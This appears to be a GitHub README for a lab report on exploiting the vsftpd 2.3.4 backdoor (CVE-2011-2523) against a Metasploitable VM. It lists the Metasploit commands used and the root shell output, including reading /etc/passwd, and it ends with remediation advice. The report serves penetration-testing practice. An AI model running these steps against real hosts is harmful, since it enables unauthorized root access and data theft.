Skip to content

Vulnerability assessment and exploitation of vsftpd 2.3.4 (CVE-2011-2523) using Metasploit. Full report and proof of root access included.

Notifications You must be signed in to change notification settings

vedpakhare/vsftpd-234-vuln-report

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

3 Commits
Β 
Β 
Β 
Β 

Repository files navigation

πŸ’₯ vsftpd 2.3.4 Backdoor Exploit Report

Exploitation of a known vulnerability in vsftpd 2.3.4 using Metasploit.

πŸ“Œ Target Details

  • Target IP: 192.168.150.133
  • Service: FTP
  • Vulnerable Version: vsftpd 2.3.4
  • Exploit Module: exploit/unix/ftp/vsftpd_234_backdoor
  • Payload: Command shell (TCP)

πŸ” Vulnerability Summary

vsftpd 2.3.4 contains a malicious backdoor that opens a command shell on port 6200 when a specially crafted username (ending in :)) is received.

CVE: CVE-2011-2523


πŸš€ Exploitation Steps

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.150.133
run

πŸ’₯ Shell Access Gained:

whoami
> root

id
> uid=0(root) gid=0(root)

hostname
> metasploitable

uname -a
> Linux metasploitable 2.6.24-16-server #1 SMP ...

cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  ...

πŸ” Impact

Root shell access gives the attacker full control over the target system β€” including privilege escalation, lateral movement, data exfiltration, and persistent access.


βœ… Recommendation

  • Do NOT use vsftpd 2.3.4.
  • Upgrade to a secure, supported version.
  • Restrict external access to FTP.
  • Monitor suspicious traffic on port 6200.

πŸ“„ Report

πŸ“ Full PDF report available in this repo: vsftpd-exploit-report.pdf


πŸ“š References


πŸ‘¨β€πŸ’» Author

Made with πŸ”₯ by vedpakhare

About

Vulnerability assessment and exploitation of vsftpd 2.3.4 (CVE-2011-2523) using Metasploit. Full report and proof of root access included.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published